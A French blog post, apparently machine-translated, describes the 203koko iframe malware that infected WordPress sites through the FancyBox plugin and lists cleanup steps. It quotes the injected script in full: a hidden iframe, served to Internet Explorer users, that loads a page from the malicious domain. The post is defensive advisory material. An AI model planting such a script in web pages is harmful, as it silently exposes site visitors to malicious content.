[Malware iframe 203koko] Site Web WordPress Logiciels malveillants infectés

Plus tôt cette semaine un certain nombre de sites et de blogs WordPress, a reçu des avertissements de logiciel malveillant par Webmasters Google.

Le problème proposé par Webmasters Google est visée à la présence d'un code / scénario logiciel malveillant iframe les sites sources.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Il semble que ce est un vulnérabilité a plug-inacquis FancyBox pour WordPress qui, jusqu'à hier (05.02.2015) ne avait pas été mis à jour depuis longtemps.
Résoudre le problème et Désinfection des virus des sites avec ce malware, est relativement simple.
1. Désactivez le plugin FancyBox.
2. Supprimer tous les fichiers plugin FancyBox du serveur (via FTP)
3. Installez la nouvelle version du plugin (Fancybox 3.0.4)

FancyBox pour WordPress 3.0.4

- Renommé le paramètre affecté par le problème de sécurité mentionné dans 3.0.3. Cela devrait empêcher le code malveillant d'apparaître sur les sites où le plugin est updated sans supprimer le code malveillant.

FancyBox pour WordPress 3.0.3

Correction d'un problème de sécurité.

Informations sur les logiciels malveillants: 

TYPE: redirection Iframe
TARGET: WordPress Boîte fantaisie
DOMAINE Malware: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODES:
MALWARE ÉCRIT: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Supprimez les logiciels malveillants de votre WordPress site .

Fondateur et rédacteur Stealth Settings, de 2006 à nos jours. Expérience sur les systèmes d'exploitation Linux (Surtout CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Comment » Google » [Malware iframe 203koko] Site Web WordPress Logiciels malveillants infectés
Laisser un commentaire